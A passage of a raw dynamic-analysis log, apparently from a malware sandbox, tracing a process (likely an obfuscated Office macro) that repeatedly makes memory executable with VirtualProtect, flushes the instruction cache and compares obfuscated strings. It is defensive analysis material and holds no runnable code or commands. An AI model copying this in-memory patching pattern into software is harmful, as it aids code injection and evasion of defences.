GetCurrentProcess () returned 0xffffffff [0102.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.317] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.318] GetCurrentProcess () returned 0xffffffff [0102.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.318] GetCurrentProcess () returned 0xffffffff [0102.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.318] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.319] GetCurrentProcess () returned 0xffffffff [0102.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.319] GetCurrentProcess () returned 0xffffffff [0102.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.319] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.319] GetCurrentProcess () returned 0xffffffff [0102.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.320] GetCurrentProcess () returned 0xffffffff [0102.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.320] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.320] GetCurrentProcess () returned 0xffffffff [0102.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.320] GetCurrentProcess () returned 0xffffffff [0102.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.320] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.321] GetCurrentProcess () returned 0xffffffff [0102.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.321] GetCurrentProcess () returned 0xffffffff [0102.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.321] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.322] GetCurrentProcess () returned 0xffffffff [0102.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.322] GetCurrentProcess () returned 0xffffffff [0102.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.322] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.322] GetCurrentProcess () returned 0xffffffff [0102.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.322] GetCurrentProcess () returned 0xffffffff [0102.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.322] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.323] GetCurrentProcess () returned 0xffffffff [0102.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.323] GetCurrentProcess () returned 0xffffffff [0102.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.323] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.324] GetCurrentProcess () returned 0xffffffff [0102.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.324] GetCurrentProcess () returned 0xffffffff [0102.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.324] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.325] GetCurrentProcess () returned 0xffffffff [0102.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.325] GetCurrentProcess () returned 0xffffffff [0102.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.325] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.325] GetCurrentProcess () returned 0xffffffff [0102.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.325] GetCurrentProcess () returned 0xffffffff [0102.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.325] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.326] GetCurrentProcess () returned 0xffffffff [0102.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.326] GetCurrentProcess () returned 0xffffffff [0102.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.326] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.327] GetCurrentProcess () returned 0xffffffff [0102.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.327] GetCurrentProcess () returned 0xffffffff [0102.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.327] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.327] GetCurrentProcess () returned 0xffffffff [0102.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.327] GetCurrentProcess () returned 0xffffffff [0102.327] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.328] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.328] GetCurrentProcess () returned 0xffffffff [0102.328] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.328] GetCurrentProcess () returned 0xffffffff [0102.328] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.328] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.329] GetCurrentProcess () returned 0xffffffff [0102.329] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.329] GetCurrentProcess () returned 0xffffffff [0102.329] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.329] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.333] GetCurrentProcess () returned 0xffffffff [0102.333] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.333] GetCurrentProcess () returned 0xffffffff [0102.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.334] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.334] GetCurrentProcess () returned 0xffffffff [0102.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.334] GetCurrentProcess () returned 0xffffffff [0102.334] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.334] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.335] GetCurrentProcess () returned 0xffffffff [0102.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.335] GetCurrentProcess () returned 0xffffffff [0102.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.335] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.336] GetCurrentProcess () returned 0xffffffff [0102.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.336] GetCurrentProcess () returned 0xffffffff [0102.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.336] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.336] GetCurrentProcess () returned 0xffffffff [0102.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.336] GetCurrentProcess () returned 0xffffffff [0102.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.336] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.337] GetCurrentProcess () returned 0xffffffff [0102.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.337] GetCurrentProcess () returned 0xffffffff [0102.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.337] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.338] GetCurrentProcess () returned 0xffffffff [0102.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.338] GetCurrentProcess () returned 0xffffffff [0102.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.338] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.338] GetCurrentProcess () returned 0xffffffff [0102.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.339] GetAsyncKeyState (vKey=3) returned 0 [0102.340] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.340] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0102.340] CRetailMalloc_Alloc () returned 0xca3cf90 [0102.340] memcpy (in: _Dst=0xcb65188, _Src=0x19759c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.340] memcpy (in: _Dst=0xcb6518c, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.340] memcpy (in: _Dst=0xcb6518c, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.340] memcpy (in: _Dst=0xcb6518c, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.340] memcpy (in: _Dst=0xcb65190, _Src=0x19759c, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0102.340] memcpy (in: _Dst=0xcb6518c, _Src=0x197548, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.340] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="\x97\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x97\x96\x97\x97\x97\x96\x96\x97\x97", cchCount2=-1) returned 1 [0102.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11432e4a, cbMultiByte=24, lpWideCharStr=0x197348, cchWideChar=25 | out: lpWideCharStr="—––––––—––—————–———––——") returned 24 [0102.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d298a, cbMultiByte=24, lpWideCharStr=0x1973a8, cchWideChar=25 | out: lpWideCharStr="—––––––—––—————–———––——") returned 24 [0102.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d298a, cbMultiByte=24, lpWideCharStr=0x1973a8, cchWideChar=25 | out: lpWideCharStr="—––––––—––—————–———––——") returned 24 [0102.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d298a, cbMultiByte=24, lpWideCharStr=0x1973a8, cchWideChar=25 | out: lpWideCharStr="—––––––—––—————–———––——") returned 24 [0102.341] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x96\x97\x96\x97\x96\x97\x97\x96\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97\x96\x96\x96", cchCount1=-1, lpString2="\x97\x96\x96\x96\x96\x96\x96\x97\x96\x96\x97\x97\x97\x97\x97\x96\x97\x97\x97\x96\x96\x97\x97", cchCount2=-1) returned 1 [0102.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111d298a, cbMultiByte=24, lpWideCharStr=0x1973a8, cchWideChar=25 | out: lpWideCharStr="—––––––—––—————–———––——") returned 24 [0102.341] CRetailMalloc_Alloc () returned 0xca0f530 [0102.341] _mbscpy_s (in: _Dst=0xca0f530, _DstSizeInBytes=0x18, _Src=0x111d298a | out: _Dst=0xca0f530) returned 0x0 [0102.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112b0ba6, cbMultiByte=31, lpWideCharStr=0x1973b8, cchWideChar=32 | out: lpWideCharStr="_B_var_—––––––—––—————–———––——") returned 31 [0102.342] CRetailMalloc_Free () returned 0x1 [0102.342] _mbscpy_s (in: _Dst=0x1974d0, _DstSizeInBytes=0x19, _Src=0x111d2a46 | out: _Dst=0x1974d0) returned 0x0 [0102.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb314ce8, cbMultiByte=7, lpWideCharStr=0x11590c9c, cchWideChar=16 | out: lpWideCharStr="w9kiTlK") returned 7 [0102.342] memcpy (in: _Dst=0xc9cd6a0, _Src=0x11590c98, _Size=0x14 | out: _Dst=0xc9cd6a0) returned 0xc9cd6a0 [0102.342] memcpy (in: _Dst=0xcb65188, _Src=0x19759c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.342] memcpy (in: _Dst=0xcb65188, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb314cfa, cbMultiByte=6, lpWideCharStr=0x1159104c, cchWideChar=14 | out: lpWideCharStr="Q3nlze") returned 6 [0102.342] memcpy (in: _Dst=0xc9cd6b8, _Src=0x11591048, _Size=0x12 | out: _Dst=0xc9cd6b8) returned 0xc9cd6b8 [0102.342] memcpy (in: _Dst=0xcb6518c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.343] memcpy (in: _Dst=0xcb6518c, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.343] memcpy (in: _Dst=0xcb65188, _Src=0x197548, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.343] memcpy (in: _Dst=0xcb65188, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.343] memcpy (in: _Dst=0xcb6518c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.343] memcpy (in: _Dst=0xcb65190, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0102.343] memcpy (in: _Dst=0xcb65190, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0102.343] memcpy (in: _Dst=0xcb65190, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0102.343] memcpy (in: _Dst=0xcb65194, _Src=0x19759c, _Size=0x4 | out: _Dst=0xcb65194) returned 0xcb65194 [0102.343] memcpy (in: _Dst=0xcb65190, _Src=0x197548, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0102.343] memcpy (in: _Dst=0xcb65194, _Src=0x19759c, _Size=0x4 | out: _Dst=0xcb65194) returned 0xcb65194 [0102.343] memcpy (in: _Dst=0xcb65290, _Src=0x19754c, _Size=0xc | out: _Dst=0xcb65290) returned 0xcb65290 [0102.343] memcpy (in: _Dst=0xcb65188, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.343] memcpy (in: _Dst=0xcb6518c, _Src=0x19759c, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.343] memcpy (in: _Dst=0xcb65188, _Src=0x197548, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.343] memcpy (in: _Dst=0xcb65188, _Src=0x19759c, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.343] memcpy (in: _Dst=0xcb6518c, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.343] memcpy (in: _Dst=0xcb65190, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0102.343] memcpy (in: _Dst=0xcb65194, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65194) returned 0xcb65194 [0102.343] memcpy (in: _Dst=0xcb65190, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0102.343] memcpy (in: _Dst=0xcb6518c, _Src=0x197548, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.343] memcpy (in: _Dst=0xcb65190, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0102.343] memcpy (in: _Dst=0xcb65194, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65194) returned 0xcb65194 [0102.344] memcpy (in: _Dst=0xcb65198, _Src=0x19759c, _Size=0x4 | out: _Dst=0xcb65198) returned 0xcb65198 [0102.344] memcpy (in: _Dst=0xcb65194, _Src=0x197548, _Size=0x4 | out: _Dst=0xcb65194) returned 0xcb65194 [0102.344] memcpy (in: _Dst=0xcb65190, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65190) returned 0xcb65190 [0102.344] memcpy (in: _Dst=0xcb6518c, _Src=0x197548, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.344] memcpy (in: _Dst=0xcb6518c, _Src=0x1973d4, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.344] memcpy (in: _Dst=0xcb6518c, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.344] memcpy (in: _Dst=0xcb65188, _Src=0x197548, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.344] memcpy (in: _Dst=0xcb6518c, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb6518c) returned 0xcb6518c [0102.344] memcpy (in: _Dst=0xcb65188, _Src=0x197568, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.344] memcpy (in: _Dst=0xca3d057, _Src=0x1974fc, _Size=0x1 | out: _Dst=0xca3d057) returned 0xca3d057 [0102.345] memcpy (in: _Dst=0xca3d0f0, _Src=0x197604, _Size=0x18 | out: _Dst=0xca3d0f0) returned 0xca3d0f0 [0102.345] CRetailMalloc_Realloc () returned 0xca3cf90 [0102.345] CRetailMalloc_Free () returned 0x1 [0102.345] GetCurrentProcess () returned 0xffffffff [0102.345] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.345] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.346] GetCurrentProcess () returned 0xffffffff [0102.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.346] GetCurrentProcess () returned 0xffffffff [0102.346] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.346] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.347] GetCurrentProcess () returned 0xffffffff [0102.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.347] GetCurrentProcess () returned 0xffffffff [0102.347] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.347] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.348] GetCurrentProcess () returned 0xffffffff [0102.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.348] GetCurrentProcess () returned 0xffffffff [0102.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.348] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.348] GetCurrentProcess () returned 0xffffffff [0102.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.348] GetCurrentProcess () returned 0xffffffff [0102.348] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.348] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.349] GetCurrentProcess () returned 0xffffffff [0102.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.349] GetCurrentProcess () returned 0xffffffff [0102.349] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.349] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.350] GetCurrentProcess () returned 0xffffffff [0102.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.350] GetCurrentProcess () returned 0xffffffff [0102.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.350] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.350] GetCurrentProcess () returned 0xffffffff [0102.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.350] GetCurrentProcess () returned 0xffffffff [0102.350] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.350] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.351] GetCurrentProcess () returned 0xffffffff [0102.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.351] GetCurrentProcess () returned 0xffffffff [0102.351] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.351] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.352] GetCurrentProcess () returned 0xffffffff [0102.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.352] GetCurrentProcess () returned 0xffffffff [0102.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.352] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.352] GetCurrentProcess () returned 0xffffffff [0102.352] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.353] GetCurrentProcess () returned 0xffffffff [0102.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.353] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.353] GetCurrentProcess () returned 0xffffffff [0102.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.353] GetCurrentProcess () returned 0xffffffff [0102.353] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.353] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.354] GetCurrentProcess () returned 0xffffffff [0102.354] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.354] GetCurrentProcess () returned 0xffffffff [0102.354] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.354] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.355] GetCurrentProcess () returned 0xffffffff [0102.355] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.355] GetCurrentProcess () returned 0xffffffff [0102.355] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.355] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.355] GetCurrentProcess () returned 0xffffffff [0102.355] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.355] GetCurrentProcess () returned 0xffffffff [0102.356] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.356] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0102.356] GetCurrentProcess () returned 0xffffffff [0102.356] FlushInstructionCache (hProcess=0xffffffff, 